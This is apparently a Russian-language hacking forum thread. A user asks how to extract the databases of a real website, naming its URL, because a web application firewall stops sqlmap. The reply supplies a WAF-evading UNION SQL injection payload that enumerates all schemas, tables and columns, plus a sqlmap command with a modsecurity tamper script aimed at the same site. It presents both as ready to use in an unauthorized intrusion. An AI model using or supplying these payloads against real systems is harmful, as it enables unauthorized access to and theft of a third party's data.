Помогите , я так понял здесь waf , sqlmap видит уязвимость , но не выводит базы , а ручками не умею (

http://www.mtes.ir/portfolio/portfolio.php?id=66

Подскажите , как быть .

Alaich said:
↑ (https://antichat.live/posts/4193512/)
Помогите , я так понял здесь waf , sqlmap видит уязвимость , но не выводит базы , а ручками не умею (
http://www.mtes.ir/portfolio/portfolio.php?id=66
Подскажите , как быть .


На случай если решить руками:


Code:
id=66'+and+0+/*!00000union*/select+1,2,3,(select(@n)from(select(@n:=0x20),(sel ect(null)from(information_schema.columns)where(0x2 b)in(@n:=concat/**/(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))and(table_schema!=0x696e666f726d617469 6f6e5f736368656d61)))n),5,6,7,8,9,0--+-

Или хочешь засрать логи:


Code:
sqlmap.py --url=http://www.mtes.ir/portfolio/portfolio.php?id=66 --no-cast --banner --dbms=MySQL --tamper=modsecurityversioned --risk 3 --level 3 --technique=U --union-cols=10 --union-char=1337